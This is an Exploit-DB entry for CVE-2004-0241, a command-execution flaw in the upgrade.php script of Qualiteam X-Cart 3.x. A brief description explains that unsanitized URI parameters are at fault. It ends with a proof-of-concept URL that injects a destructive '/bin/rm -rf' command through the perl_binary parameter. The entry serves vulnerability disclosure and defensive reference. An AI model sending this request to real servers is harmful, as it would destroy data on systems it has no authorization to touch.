Qualiteam X-Cart 3.x upgrade.php perl_binary Parameter Arbitrary Command Execution

2004-02-03T00:00:00
ID EDB-ID:23637
Type exploitdb
Reporter Philip
Modified 2004-02-03T00:00:00

Description

Qualiteam X-Cart 3.x upgrade.php perl_binary Parameter Arbitrary Command Execution. CVE-2004-0241. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/9560/info
 
X-Cart has been reported to be prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI. 

http://server/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=..